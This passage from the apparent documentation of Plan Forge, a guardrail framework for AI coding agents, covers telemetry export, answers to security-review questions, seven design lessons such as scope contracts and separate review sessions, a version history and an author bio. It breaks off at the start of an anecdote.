The speed preset works (gpt-4.1-mini exists in gov)
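The "graceful fallback" idea can be illustrated with a small filter over the gov catalog. This is a sketch under stated assumptions: `resolve_preset` and the preference order are hypothetical, and only the catalog entries come from the model list above.

```python
# Chat models copied from the "Model availability" list above.
GOV_CATALOG = {"gpt-5.1", "gpt-4.1", "gpt-4.1-mini", "o3-mini", "gpt-4o"}


def resolve_preset(preferred: list[str], available: set[str]) -> list[str]:
    """Keep the preferred models that exist in the region, preserving order."""
    resolved = [model for model in preferred if model in available]
    if not resolved:
        raise LookupError("no preferred model is available in this region")
    return resolved


# Hypothetical preference order for a gov-friendly "power" preset.
power_gov = resolve_preset(
    ["gpt-5.5", "claude-opus-4.7", "gpt-5.1", "gpt-4.1"], GOV_CATALOG
)
```

Failing loudly when nothing resolves is a deliberate choice here: a silent downgrade to an unintended model is harder to notice than an error at startup.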

Compliance certifications inherited

Both global Azure and Azure Government are FedRAMP High. Azure Government adds contractual commitments around US-based data storage and screened-US-persons access. HIPAA and PCI are covered under Azure's standard compliance umbrella for the underlying services; Plan Forge running on top inherits the boundary.

For Azure Government Secret and Top Secret cloud feature availability, contact your Microsoft account team; public documentation is limited.

Observability export

The Week 2 work in the enterprise hardening track adds first-class OpenTelemetry export. Spec is documented in the enterprise-fleet-readiness research §8.6. Summary:

What gets emitted

Spans for every LLM call (CLIENT, kind chat/embeddings/etc.) with full gen_ai.* attribute set including token counts (input, output, cache_read, cache_write, reasoning), latency, model, provider
Spans for every MCP tool call (INTERNAL, kind execute_tool) with tool name and call ID
Spans for every slice (INTERNAL, kind invoke_agent) with plan/slice correlation
Spans for every plan run (INTERNAL, kind invoke_workflow)
Spans for every validation gate (INTERNAL, plan-forge-vendor namespace)
Metrics: gen_ai.client.operation.duration histogram, gen_ai.client.token.usage histogram
Events (opt-in): gen_ai.client.inference.operation.details with input/output messages (gated by the pforge.telemetry.captureContent flag, which defaults to off because of PII implications)

Vendor-namespaced extensions

pforge.* attributes for plan/slice/run correlation, scope contract IDs, gate names, cost USD (since gen_ai.cost doesn't exist in the spec).
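To make the attribute layout concrete, here is a sketch of the attribute set one LLM-call span might carry. The `gen_ai.*` keys follow the OpenTelemetry GenAI semantic conventions as I understand them (verify against the version you pin), while every `pforge.*` key name below is a hypothetical placeholder, since the exact names are not given in this chapter.

```python
def llm_span_attributes(model: str, provider: str, input_tokens: int,
                        output_tokens: int, run_id: str, slice_id: str,
                        cost_usd: float) -> dict:
    """Build a flat attribute dict for one LLM-call span (span kind CLIENT)."""
    return {
        # Standard GenAI convention keys (check against your pinned semconv version).
        "gen_ai.operation.name": "chat",
        "gen_ai.provider.name": provider,
        "gen_ai.request.model": model,
        "gen_ai.usage.input_tokens": input_tokens,
        "gen_ai.usage.output_tokens": output_tokens,
        # Hypothetical vendor-namespaced keys for correlation and cost.
        "pforge.run.id": run_id,
        "pforge.slice.id": slice_id,
        "pforge.cost.usd": cost_usd,
    }
```

Keeping cost under the vendor namespace mirrors the point above: the spec has no cost attribute, so backends should treat it as a Plan Forge extension.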

Backends supported

Anything that speaks OTLP. Tested compatibility (planned for Week 2):

Splunk Observability Cloud
Datadog
Grafana Tempo
Microsoft Application Insights (especially relevant for Foundry-attached deployments: Foundry uses the same OTel gen_ai.* conventions, so Plan Forge runs land in the same dashboards as the customer's Foundry agents)
Honeycomb
Customer-hosted OTel Collector

Privacy controls

Content capture (prompt + completion text) is opt-in and off by default
Three patterns supported: don't capture / capture as span attributes / externalize via hook to a separate store with only references on the span
Toggle via pforge.telemetry.captureContent config flag and standard OTel env vars
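The three capture patterns can be sketched as a single policy function. This is illustrative only: the mode names, the `pforge.content.*` keys, and the dict-backed `store` are all assumptions, standing in for whatever hook and external store a deployment actually uses.

```python
import hashlib


def apply_capture_policy(attrs: dict, prompt: str, completion: str,
                         mode: str = "off", store=None) -> dict:
    """Return a copy of attrs with content handled per the capture mode."""
    out = dict(attrs)
    if mode == "off":
        return out  # pattern 1: never capture content
    if mode == "attributes":
        # Pattern 2: content travels on the span itself.
        out["pforge.content.prompt"] = prompt
        out["pforge.content.completion"] = completion
        return out
    if mode == "external":
        # Pattern 3: content goes to a separate store; the span keeps a reference.
        if store is None:
            raise ValueError("external mode needs a store")
        payload = prompt + "\n---\n" + completion
        ref = hashlib.sha256(payload.encode("utf-8")).hexdigest()
        store[ref] = payload
        out["pforge.content.ref"] = ref
        return out
    raise ValueError(f"unknown capture mode: {mode}")
```

The external pattern is the one to reach for when the telemetry backend has a broader audience than the people cleared to read prompts.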

Common security review questions

Where can our source code go?

Wherever you choose to send it via your configured LLM provider. With on-prem inference, nowhere outside your network. Plan Forge itself never transmits source code.

Does Plan Forge phone home?

No telemetry is transmitted to Plan Forge maintainers. The optional update check fetches release metadata from GitHub. Disable with PFORGE_NO_UPDATE_CHECK=1.

Can we audit every action an agent took?

Yes. Per-run trajectory in .forge/runs/<id>/ includes events, slice artifacts, traces, cost history, and (for CCA-dispatched runs) the full Copilot Cloud Agent trajectory.

How do we prevent agents from editing files outside scope?

Plan Forge enforces scope contracts at the plan level (In Scope, Out of Scope, Forbidden Actions blocks). Pre-tool-use hooks block edits to forbidden paths. Post-execution pforge diff checks for drift.

Honest gap: enforcement is best-effort at the worker level; the orchestrator can't always prevent a bad edit, only detect it. Hardening this is on the roadmap.

What happens if an agent malfunctions?

A per-slice workerTimeoutMs cap kills runaway workers. Reflexion retry with backoff handles recoverable failures. forge_alert_triage ranks issues by priority. An in-loop stuck detector (OpenHands pattern) is on the roadmap.
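The timeout-plus-retry behavior can be approximated in a few lines. This is a plain exponential-backoff sketch, not Plan Forge's Reflexion implementation (which this chapter does not detail); `run_with_retry` and its parameters are hypothetical, and only the millisecond timeout mirrors `workerTimeoutMs`.

```python
import subprocess
import time


def run_with_retry(cmd, timeout_ms, max_attempts=3, base_delay_s=1.0,
                   sleep=time.sleep):
    """Run a worker command with a hard timeout, retrying with exponential backoff."""
    for attempt in range(1, max_attempts + 1):
        try:
            result = subprocess.run(cmd, timeout=timeout_ms / 1000,
                                    capture_output=True, text=True)
            if result.returncode == 0:
                return result.stdout
        except subprocess.TimeoutExpired:
            pass  # subprocess.run kills the child process before raising
        if attempt < max_attempts:
            sleep(base_delay_s * 2 ** (attempt - 1))  # 1s, 2s, 4s, ...
    raise RuntimeError(f"worker failed after {max_attempts} attempts")
```

Passing `sleep` as a parameter keeps the function testable without real delays.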

Can we enforce a budget per team?

.forge.json per repo supports cost.dailyMax and similar caps (planned formalization). Per-engineer attribution is on the roadmap.
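A daily cap check is simple to reason about. In the sketch below, only the `cost.dailyMax` key path comes from the text above; the function name and the idea of checking an estimate before dispatch are assumptions for illustration.

```python
def within_daily_budget(config: dict, spent_today_usd: float,
                        next_estimate_usd: float) -> bool:
    """Return True when the next run still fits under cost.dailyMax."""
    cap = config.get("cost", {}).get("dailyMax")
    if cap is None:
        return True  # no cap configured, so nothing to enforce
    return spent_today_usd + next_estimate_usd <= cap
```

For example, with `{"cost": {"dailyMax": 25}}`, a team that has spent 20 USD can still start a run estimated at 4 USD but not one estimated at 6 USD.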

What's the data retention model?

Plan Forge does not delete .forge/ artifacts automatically. Retention is the customer's policy; implement it via standard filesystem tools or post-run cleanup hooks.
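A retention policy can be as small as a scheduled script. The sketch below assumes each run lives in its own directory under `.forge/runs/` (as described in the audit answer above) and uses the directory's modification time as the age signal; the function name and the 30-day example are hypothetical.

```python
import shutil
import time
from pathlib import Path


def prune_runs(runs_dir: Path, max_age_days: int, now=None) -> list:
    """Delete run directories older than max_age_days; return the removed names."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * 86400
    removed = []
    if not runs_dir.is_dir():
        return removed
    for run in sorted(runs_dir.iterdir()):
        # Only whole run directories are considered; stray files are left alone.
        if run.is_dir() and run.stat().st_mtime < cutoff:
            shutil.rmtree(run)
            removed.append(run.name)
    return removed
```

Calling `prune_runs(Path(".forge/runs"), 30)` from cron or a post-run hook would keep roughly a month of trajectories. If audit rules require longer retention, archive before deleting.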

Are LLM responses cached?

Plan Forge does not cache LLM responses. Some LLM providers (Anthropic, OpenAI) do prompt caching; that's their infrastructure, billed at reduced rates. Plan Forge tracks cache hit/miss for cost accuracy (Phase-COST-TOKEN-COVERAGE landed the per-vendor billing math).

How do we know Plan Forge itself isn't compromised?

Open source. MIT license. Audit the code. Plan Forge is dogfooded against itself: every release ships through the same Plan Forge pipeline that customers use. Self-repair tooling (forge_meta_bug_file) gives agents a way to file defects against Plan Forge during execution.

An aged leather-bound tome open on the workbench at the Plan Forge shop, its pages glowing softly with rune annotations and small ember sparks rising upward from each lesson, a quill resting in an inkwell beside it, broken hammers and dented anvils visible in the dim background as evidence of past mistakes

Reference

Lessons Learned

Seven principles behind Plan Forge's architecture: what each one prevents and where it is enforced.

When to read this chapter: reviewing why Plan Forge enforces what it enforces, onboarding to the architecture, or evaluating whether a proposed change conflicts with a foundational principle.

Reference adaptation of the marketing essay I Built Guardrails for AI Coding Agents — Here's What I Learned (April 2026). The blog tells the story; this chapter captures the principles.

Lesson 1 — Agents Don't Drift Maliciously; They Drift Because No Rule Said Stop

Principle: Define what should not be built, not just what should. Explicit prohibitions cut scope drift by, to quote the source, "an order of magnitude" (guardrails-lessons-learned blog).

Failure mode it addresses: An agent asked to "build a login page" produces a login page plus a password reset flow, an admin panel, a user profile system, and refactored database migrations. The agent is not being creative; it is being thorough with zero scope constraints.

Where it is enforced: Every hardened plan ships a Forbidden Actions section in the Scope Contract. The PreToolUse lifecycle hook (see How It Works → Building Blocks) blocks file edits to paths listed in the active plan's Forbidden Actions. The pattern is enforced by the plan-hardening prompt, not left to the executing agent's discretion.
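The blocking step can be pictured as a path check that runs before any edit tool fires. This is a sketch under assumptions: it treats Forbidden Actions entries as directory prefixes, and `is_forbidden`, `pre_tool_use`, the tool names, and the returned dict shape are all hypothetical rather than the hook's real contract.

```python
import posixpath
from pathlib import PurePosixPath


def is_forbidden(path: str, forbidden_dirs: list[str]) -> bool:
    """True when the normalized path sits inside any forbidden directory."""
    target = PurePosixPath(posixpath.normpath(path))  # collapses "a/../b" tricks
    return any(target.is_relative_to(PurePosixPath(d)) for d in forbidden_dirs)


def pre_tool_use(tool: str, path: str, forbidden_dirs: list[str]) -> dict:
    """Decide whether an edit-like tool call may proceed."""
    if tool in {"edit", "write"} and is_forbidden(path, forbidden_dirs):
        return {"allow": False,
                "reason": f"{path} is under a Forbidden Actions path"}
    return {"allow": True, "reason": ""}
```

Matching on whole path segments matters: a prefix string comparison would wrongly block `db/migrations_old/` when only `db/migrations/` is forbidden.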

"The most powerful guardrail isn't 'do this.' It's 'don't do that.'"

Lesson 2 — Auto-Loading Beats Manual Attachment Every Time

Principle: Guardrails that require manual activation are guardrails that go unused. File-pattern-scoped auto-loading drives compliance from optional to default.

Failure mode it addresses: Early Plan Forge required developers to manually attach instruction files to each chat session. Adoption sat at roughly 20% ("whoever remembered"). After the breakthrough of applyTo frontmatter, adoption climbed to 100% because activation became automatic on file edits.

Where it is enforced: Each instruction file in .github/instructions/ declares which file patterns it cares about via YAML frontmatter:

.github/instructions/security.instructions.md

---
description: Security guardrails for auth and middleware
applyTo: '**/auth/**,**/middleware/**'
---

When a file matching the pattern is edited, the instruction file loads automatically into the agent's context. See Customization → Custom Instructions for the full pattern reference.
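To see how a comma-separated applyTo value selects files, the sketch below approximates the matching with a small glob-to-regex translator. The real matching is done by the editor, so treat this as an illustration of the semantics (`**` spans directories, `*` stays within one path segment), not as the platform's implementation; both function names are hypothetical.

```python
import re


def glob_to_regex(pattern: str) -> re.Pattern:
    """Translate a glob where ** spans directories and * stays in one segment."""
    out = []
    i = 0
    while i < len(pattern):
        if pattern.startswith("**/", i):
            out.append(r"(?:.*/)?")  # zero or more leading directories
            i += 3
        elif pattern.startswith("**", i):
            out.append(r".*")        # anything, including slashes
            i += 2
        elif pattern[i] == "*":
            out.append(r"[^/]*")     # anything within one segment
            i += 1
        elif pattern[i] == "?":
            out.append(r"[^/]")
            i += 1
        else:
            out.append(re.escape(pattern[i]))
            i += 1
    return re.compile("".join(out) + r"\Z")


def matches_apply_to(path: str, apply_to: str) -> bool:
    """True when the path matches any comma-separated applyTo pattern."""
    return any(glob_to_regex(p.strip()).match(path) for p in apply_to.split(","))
```

With the frontmatter above, `src/auth/login.ts` and `api/middleware/cors.ts` would load the security instructions, while `src/oauth/client.ts` would not, because `auth` must be a whole directory name.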

Lesson 3 — The Builder Must Never Review Its Own Work

Principle: The session that wrote the code cannot evaluate it objectively. Sunk-cost bias is a property of the context window, not the model. A fresh review session catches what the build session is structurally unable to see.

Failure mode it addresses: In a single long chat session, the agent that wrote the code will always believe its code is correct. The blind spots that produced the bug live in the same token sequence as the proposed fix. Self-review fails silently: the agent gives itself a passing grade and moves on.

Where it is enforced: Plan Forge mandates session isolation. Builder works in Session 2; reviewer works in Session 3 with fresh context, the same guardrails, and independent judgment. See How It Works → Why Session Isolation Works for the deeper psychological breakdown, and How It Works → The 4-Session Model for the structural reference.

The analogy from the source essay: would a developer be allowed to merge their own PR without review? Same question, same answer for AI agents.

Lesson 4 — Slice Boundaries Are the Only Real Validation Points

Principle: Testing "at the end" does not work. Failures cascade across files faster than the agent can debug them. Validation must happen at every slice boundary: the agent cannot proceed to slice N+1 until slice N passes its gate.

Failure mode it addresses: Building 15 files before running tests guarantees that failures compound. The agent burns its context window chasing regressions that span files it has long since stopped reasoning about.

Where it is enforced: Every hardened plan decomposes a feature into 3–7 execution slices, each with its own Validation Gate. The orchestrator runs the gate after each slice and refuses to advance on failure. See Writing Plans → Slicing Strategy for the slice contract and How It Works → Building Blocks for the gate enforcement model.

Slice gates produce three observable benefits:

Failures are caught when they are small (1–3 files, not 15)
The agent fixes the problem with full context of what it just wrote
Green-to-green progression means a safe rollback point always exists
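The gate-per-slice rule reduces to a short loop. The sketch below is a simplified model, not the orchestrator's code: each slice is a hypothetical `(name, execute, gate)` triple, and a failed gate stops the run while reporting the last green slice as the rollback point.

```python
from typing import Callable

# (name, execute, gate): execute does the work, gate returns True on success.
Slice = tuple[str, Callable[[], None], Callable[[], bool]]


def run_plan(slices: list[Slice]) -> list[str]:
    """Run slices in order; refuse to advance past a failing gate."""
    passed = []
    for name, execute, gate in slices:
        execute()
        if not gate():
            last_green = passed[-1] if passed else "none"
            raise RuntimeError(
                f"gate failed at slice '{name}'; last green slice: {last_green}"
            )
        passed.append(name)
    return passed
```

Because the loop never runs slice N+1 after a red gate, a failure is always confined to the files that slice N just touched.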

Lesson 5 — Focused Instruction Files Beat One Giant Guardrails Document

Principle: One concern per file. Each file under ~150 lines. Auto-loaded only when relevant. Long monolithic instruction documents process worse than short focused ones: agents cherry-pick what's convenient and ignore the rest.

Failure mode it addresses: The first version of Plan Forge had a single copilot-instructions.md at roughly 2,000 lines covering security, testing, architecture, database patterns, error handling, and deployment. Key rules got buried, contradictions crept in, and the agent applied rules selectively.

Where it is enforced: The .github/instructions/ directory contains 18+ focused files, each with a single concern. See Customization → Custom Instructions for the inventory.

v2.18 extension: Temper Guards and Warning Signs. Each instruction file now ends with two named sections. Temper Guards documents the specific shortcuts agents take that produce compiling but architecturally broken code (e.g. "this is just a DTO, no logic to test", "N+1 won't matter at our scale"); Warning Signs lists observable anti-patterns that reviewers can grep for. Each file teaches not just what to do but why not to skip it.

Lesson 6 — Tech Stack Presets Are Not Optional

Principle: Every stack has different conventions. Guardrails that say "use PascalCase" to a Python developer get the entire system distrusted. Stack-aware presets eliminate the customization tax.

Failure mode it addresses: A stack-agnostic guardrail document either contradicts the project's conventions in places (loss of trust) or stays so generic that it fails to enforce anything specific (loss of value). The middle ground does not exist.

Where it is enforced: Nine first-party presets ship with Plan Forge (.NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC), selectable via setup.ps1 -Preset <name> at install time. Multi-preset combinations are supported (e.g. -Preset typescript,azure-iac) for full-stack projects. See Stack-Specific Notes for what each preset adjusts.

Lesson 7 — Enterprise Quality Must Be the Default, Not an Upgrade

Principle: Treating quality as optional ("add tests later", "we'll refactor", "security can wait") guarantees that the optional steps never happen. Quality must be structural: the path of least resistance must produce tested, validated, architecturally compliant code.

Failure mode it addresses: Every "we'll fix it later" trains the next agent session to copy the same shortcut. The codebase accumulates technical debt that nobody is responsible for paying down.

Where it is enforced: Hardened plans include test expectations per slice. Architecture guardrails load on every file change. Security guardrails load on every auth file. Testing guardrails load on every test file. There is no "opt in to quality" path; bypassing the defaults requires actively working around them.

v2.19 extension: Exit Proof. Every skill now ends with a verifiable checklist: not "it seems right" but "paste the test output, show the migration file, prove coverage didn't drop." Evidence over assumption. See Customization → Skills for the Exit Proof contract.

"The best developer tools don't make quality easier. They make it unavoidable."

Project History

Eleven inflection points from v1.0 (Summer 2025) to v3.6 (May 2026). Each one solved a specific problem the previous version exposed.

Plan Forge evolution timeline showing eight headline version milestones: v1.0 Summer 2025 (18 instruction files plus 4-session pipeline), v2.0 January 2026 (autonomous orchestrator plus 17 MCP tools), v2.5 February 2026 (Quorum Mode 3-model consensus), v2.10 March 2026 (OpenClaw bridge for cross-platform notifications), v2.14 March 2026 (Copilot platform integration), v2.18 April 2026 (Temper Guards plus Warning Signs plus Context Fuel), v2.83 May 2026 (host-aware routing plus quorum estimator plus complexity rubric), and v3.6 May 2026 highlighted in amber as current (OpenBrain promoted to L3 memory layer). The May 2026 v3.x sprint also shipped v2.95 Lattice code-graph indexing, v3.0 Copilot integration trilogy, and v3.2 through v3.4 Team Mode, covered in the prose sections below.

When to read this chapter: understanding why a feature exists, evaluating whether a design constraint is foundational or contingent, or onboarding to the architecture's history.

Reference adaptation of the marketing essay From Impossible to 7 Minutes — A Year of Building AI Coding Guardrails (April 2026), extended through v3.6 from the CHANGELOG.

v1.0 — Foundation (Summer 2025)

What shipped: 18 specialized instruction files, prompt templates, and the 4-session pipeline (Specify → Plan → Execute → Review). Plan Forge at this point was "files you install": a guardrail collection that lived in the project's .github/ directory.

Inflection point: The breakthrough was not the file count. It was discovering that session isolation works: the builder cannot review its own work, but a separate session with fresh context catches blind spots reliably. This insight made consistent quality possible and became the foundation everything else built on. See How It Works → Why Session Isolation Works and Lessons Learned → Lesson 3.

What it solved: Single-session AI work had a quality ceiling: agents would believe their own bad code was correct because the bad code lived in the same context window as the proposed fix.

v2.0 — Autonomous Orchestrator (January 2026)

What shipped: DAG-based execution engine with CLI worker spawning, 17 MCP tools (forge_run_plan, forge_analyze, forge_diagnose, forge_cost_report, etc.), the pforge CLI, and the dashboard with live progress / cost aggregation / session replay.

Inflection point: Plan Forge stopped being "files you install" and became "a system that runs." The MCP server gave it a programmatic API; the dashboard gave it visibility; the orchestrator made full plan execution possible without human intervention between slices.

What it solved: Hardened plans existed in v1.0 but a human had to drive each slice. Long features required hours of supervised execution. The orchestrator removed the supervision tax for everything except gate failures.

v2.5 — Quorum Mode (February 2026)

What shipped: Multi-model consensus analysis. Three models analyze the same slice independently; a reviewer model synthesizes their findings into a unified report. See Advanced Execution → Quorum Mode for current mechanics.

Inflection point: Single-model execution was hitting its limits. Claude excelled at architecture; GPT at breadth; Grok brought a different analytical lens. Each model had blind spots, and those blind spots were consistent. Treating AI code analysis as a consensus process, the way human code review works, produced 20% more test recommendations than any single model alone (per quorum A/B test).

What it solved: Quality plateau on complex slices. One model's blind spot is another model's strength.

v2.10 — OpenClaw Bridge (March 2026)

What shipped: Cross-platform notification fan-out to Telegram, Slack, Discord, Microsoft Teams, PagerDuty, and OpenClaw, with inline approval / reject flows for events that need a human. See Remote Bridge.

Inflection point: Plan Forge runs inside the IDE, but some decisions are not IDE-shaped. A reviewer flags drift at 2 AM. A quorum tie needs a human tiebreaker. An incident fires after the laptop closes. The bridge made the forge able to reach you instead of waiting for you to come back.

What it solved: The "I missed the notification" failure mode that blocked autonomous execution overnight or away from the desk.

v2.14 — Copilot Platform Integration (March 2026)

What shipped: A native VS Code experience with skills, agents, Plan Forge lifecycle hooks (PreDeploy, PreCommit, PreAgentHandoff, PostSlice, configured via .github/hooks/plan-forge.json), and instruction auto-loading via applyTo frontmatter. (These are not Claude Code's SessionStart / PreToolUse / PostToolUse / Stop hooks; the trigger semantics differ. See Installation for the mapping.) See Multi-Agent → Copilot.

Inflection point: Auto-loading turned guardrail adoption from optional ("whoever remembered") to default ("it just works"). The applyTo pattern moved compliance from roughly 20% to 100%. See Lessons Learned → Lesson 2.

What it solved: Manual instruction-file attachment was a dead pattern. Lifecycle hooks gave Plan Forge the ability to enforce rules at file-edit time rather than relying on the agent to remember to load them.

v2.18 — Temper Guards, Warning Signs, Context Fuel (April 2026)

What shipped: Each instruction file gained two new sections: Temper Guards, documenting the specific shortcuts agents take that produce compiling but architecturally broken code, and Warning Signs, listing observable anti-patterns reviewers can grep for. A new Context Fuel instruction file taught agents to manage their own context budgets.

Inflection point: Agent-skills analysis revealed a class of failure that previous guardrails missed: the model would write code that compiled, passed tests, and looked plausible while violating an architectural principle nobody had thought to forbid explicitly. Temper Guards captured these as named anti-patterns; Warning Signs gave reviewers a way to detect them.

What it solved: The "looks correct, is structurally wrong" failure mode. Compiling code is not architecturally compliant code.

v2.83 — Host-Aware Routing, Quorum Estimator, Complexity Rubric (May 2026)

What shipped: Host-aware model routing (subscription-vs-API billing surface awareness), forge_estimate_quorum tool for tool-backed cost projection across all four quorum modes, and the documented complexity scoring rubric (scoreSliceComplexity()) with seven weighted signals. See Host-Aware Routing and Estimating Quorum Cost.

Inflection point: Quorum cost was previously hand-computed by agents, and observed to overshoot reality by an order of magnitude. The estimator tool replaced chat math with measured projection. Host-aware routing fixed the silent-double-pay failure mode where gpt-* models on Claude Code or Cursor would bill the user's pay-per-token API instead of their existing subscription.

What it solved: Cost surprise. Both the quorum overhead surprise (estimator) and the host billing surprise (routing).

v2.95 — Lattice / Code-Graph Indexing (May 2026)

What shipped: Phase Lattice introduced tree-sitter-based code chunking, code-graph indexing, and the forge_lattice_* tool family (index, query, callers, blast, stat). Anvil caching for cost-effective re-indexing. Hallmark provenance tracking on every chunk. v3.5.1 added camelCase-aware relevance ranking via scoreChunk() / tokenizeForSearch().

Inflection point: Plan Forge could now reason about the user's actual codebase architecture, not just plans and instructions. Searching getUserById returns the function, its callers, and its blast radius across the repository. This made auto-generated plans architecture-aware: a slice that touches a hub function gets flagged as high-blast-radius before execution.

What it solved: Plans that looked safe in isolation but rippled unexpectedly. Pre-Lattice, the agent had to grep its way to architectural awareness slice by slice.
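The blast-radius idea can be illustrated as a breadth-first walk over a reverse call graph. This is a conceptual sketch only: the `callers` map and function names are made up, and nothing here reflects how the forge_lattice_* tools are actually implemented.

```python
from collections import deque


def blast_radius(callers: dict[str, set[str]], target: str) -> set[str]:
    """Return every function that directly or transitively calls target."""
    seen = set()
    queue = deque([target])
    while queue:
        fn = queue.popleft()
        for caller in callers.get(fn, ()):
            # Skip already-visited callers and the target itself (handles cycles).
            if caller not in seen and caller != target:
                seen.add(caller)
                queue.append(caller)
    return seen


# Hypothetical graph: key is a function, value is the set of its direct callers.
graph = {
    "getUserById": {"loadProfile", "checkAuth"},
    "loadProfile": {"renderDashboard"},
    "checkAuth": {"renderDashboard", "apiMiddleware"},
}
```

In this toy graph, a slice that edits `getUserById` reaches four other functions, which is the kind of signal that would mark it as high-blast-radius before execution.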

v3.0 — Copilot Integration Trilogy (May 2026)

What shipped: Three sync surfaces, completed in three consecutive releases. pforge sync-spaces (v2.98) generates Copilot Spaces from forge plans and principles. forge_sync_memories (v2.99) writes .github/copilot-memory-hints.md from cross-tool memory. forge_sync_instructions (v3.0) generates .github/copilot-instructions.md from project profile, project principles, extra instruction files, and .forge.json config.

Inflection point: Copilot became a first-class citizen of the Plan Forge ecosystem, not just one of several agent surfaces. Every Copilot conversation now opens with project-specific guidance auto-loaded by the platform: no manual setup, no forgotten attachments. This collapsed the onboarding gap for the largest installed base of any AI coding agent.

What it solved: Copilot users were getting generic guidance because copilot-instructions.md was hand-written or absent. The sync trilogy made the file always up to date and always reflective of the actual project's profile, principles, and configuration.

v3.2–3.4 — Team Mode (May 2026)

What shipped: Three releases focused on multi-developer awareness. v3.2 added .forge/team-activity.jsonl (shared run log), the forge_team_activity MCP tool, and pforge team activity. v3.3 added pforge github review delegate: when a slice produces a PR, an issue assigned to @copilot is filed with a structured review checklist, and the Copilot Coding Agent posts findings back on the PR. v3.4 added the Team tab in the dashboard with per-operator cards, success rates, costs, and a conflict-risk banner.

Inflection point: Plan Forge stopped being a solo tool. Teams running parallel plan executions against the same repository could now see who was working on what, get reviewer attention from the Copilot Coding Agent without a human handoff, and detect coordination risk before two developers stepped on each other's slices.

What it solved: The "two of us hit the same file" failure mode. And the "I shipped a PR but nobody reviewed it" failure mode.

v3.6 — OpenBrain Promotion / L3 Memory Made Loud (May 2026, current)

What shipped: OpenBrain, the optional cross-session semantic memory backend, was reframed from a row-5 "optional extension" to the L3 memory layer, with a clear on-ramp at every install touchpoint. pforge smith now always reports L3 status. setup.ps1 / setup.sh prompt for OpenBrain install at the end of the flow (auto-suppressed in CI). New pforge brain {status, hint, test, replay} subcommands. README gains a numbered Step 3 "Enable Persistent Memory" with four deploy options. The if (openBrainConfigured) gating did not change; Plan Forge still works perfectly without it. See Memory Architecture on GitHub.

Inflection point: OpenBrain hooks were already wired into 28 MCP tools, 4 search-before-acting prompts, Reflexion lessons, Auto-skills, and cross-project Federation, but every one was gated and silently no-op'd otherwise. Users who didn't know to install OpenBrain were getting Plan Forge's L1 (Hub events) plus L2 (.forge/*.jsonl durable files) memory but no persistent semantic memory across sessions. The inner loop that makes the agent improve over time was effectively dark. v3.6 made the L3 layer discoverable without changing any soft-fail behavior.

What it solved: The "Plan Forge isn't getting smarter over time" failure mode. Without L3, Reflexion lessons, Auto-skills, and postmortem learnings had nowhere durable to live across sessions.

About the Author

Scott Nichols

Director, Strategic Account Technology Strategist (Virtual CTO), Microsoft

Software & Digital Platforms · Boise, ID

GitHub LinkedIn

Brand new here? Start with What Is Plan Forge for the 60-second overview, then come back.

About the Microsoft title. I mention it because being close to the source of these models (Copilot, Azure OpenAI, MCP) is part of why Plan Forge looks the way it does. I see how the primitives are built and where they break, and that shapes what gets built on top of them. Plan Forge itself is a personal project, not a Microsoft product. The code, the opinions, and any breakage are mine.

Why I Built This

Plan Forge came from frustration: my own.

I've spent my career as a software architect. First building enterprise systems, then helping teams at Microsoft build them on Azure. I know what good architecture looks like: clean layers, clear boundaries, every component with a purpose. Lasagna, not spaghetti.

When AI coding agents arrived, I was excited. Here was a tool that could generate code faster than any team I'd ever managed. But the excitement wore off fast. The agents were brilliant at greenfield work (scaffolding, boilerplate, CRUD endpoints), but they had no concept of architectural discipline. They made decisions I didn't ask for, expanded scope without warning, and produced code that compiled but couldn't be maintained.

Sound familiar? If you've hit the 80/20 wall (the point where AI-built code stops scaling), you know exactly what I mean.

I realized the problem wasn't the models. The models were capable. The problem was that nobody was giving them structure. No scope contracts. No validation gates. No separation between building and reviewing. We'd spent decades learning that human dev teams need guardrails, code reviews, and architectural governance, then handed AI agents a blank prompt and said "build me an app."

So I started writing those guardrails. First as instruction files I pasted into Copilot chats. Then as structured prompts. Then as a pipeline with sessions and validation gates. Then as a full framework with agents, skills, lifecycle hooks, an orchestrator, a dashboard, and cost tracking.

I built Plan Forge because I needed it. The same impulse that made me establish coding standards for human teams drove me to establish them for AI teams. The tools are different, but the principles are the same: clear scope, layered architecture, validation at boundaries, independent review, and no spaghetti code, ever.

If I'm being honest, Plan Forge also exists because of Spec Kit. That was the project that taught me the fix wasn't a better model. It was structure. Define what you want. Plan before you build. Stop letting the agent improvise. Plan Forge took that idea and pushed on it: scope contracts, auto-loading guardrails, isolated review sessions, multi-model consensus, then a whole runtime watch layer for what happens after the build leaves the shop. The two tools are still better together. See the Spec Kit interop chapter for the details.

Why a Forge?

People ask why the forge metaphor. Why not "Plan AI" or "Spec Pipeline" or some other clean-tech name? Because I'm a huge advocate of software as craft, and the trades got there first.

I'm a metal and wood worker in my own home workshop. There's something about working with your hands (hammering, planing, joining, fitting) that teaches discipline you cannot shortcut. The apprentice learns under a journeyman, the journeyman learns under a master, and at every step the work has to pass inspection before it leaves the shop. Skip a step and the piece fails. Lie about a measurement and someone gets hurt downstream. That's a culture of care that modern software development has mostly forgotten, and AI agents (left alone with a blank prompt) forget it even faster than humans do.

The forge is the oldest expression of that culture. Fire, hammer, anvil, water, repeat. Every great piece of metalwork came out of a disciplined process with explicit stages, and the smith had a name for every step. I wanted Plan Forge to feel the same way. Every concept in the framework has a real-world craft analog. A plan is a work order. A reviewer agent is a quality inspector. The Crucible is where raw material gets melted down and reshaped. LiveGuard is the warranty card after the piece leaves the shop. The four-station shop layout is literally the floor plan of a working forge, divided by function.

Naming things this way isn't decoration; it's a forcing function. If I can't find a real-world equivalent for an abstraction, that's usually a sign the abstraction isn't doing real work. The metaphor catches things that look like software but aren't actually building anything. Software is a young craft, but it doesn't have to be a careless one. Plan Forge is my attempt to bring the old traditions (apprentice to journeyman to master, hammer and anvil, fit and finish) into the place where AI agents and humans build things together.

Moments From the Forge

People sometimes ask which specific failure made me start writing guardrails. Honestly, it wasn't one. It was the same failure on loop. A few of them stuck hard enough to change the design.

The 2,000-line file

My first attempt at fixing any of this wasn't a framework. It was a single copilot-instructions.md that ballooned to about 2,000 lines: security, testing, architecture, deployment, everything I could think of crammed into one document. It was terrible. The agent cherry-picked, ignored half of it, and treated rules buried after line 1,500 as optional suggestions.

But it was also the first time I watched an AI consistently produce an interface before a concrete class. For one beautiful moment, somebody had told it what good looked like. The model didn't get smarter. It got direction. That was the hypothesis I've been refining ever since, and the reason today's instruction files are 80 to 200 lines each, auto-loaded by file pattern, one concern per file.

The demo with a database

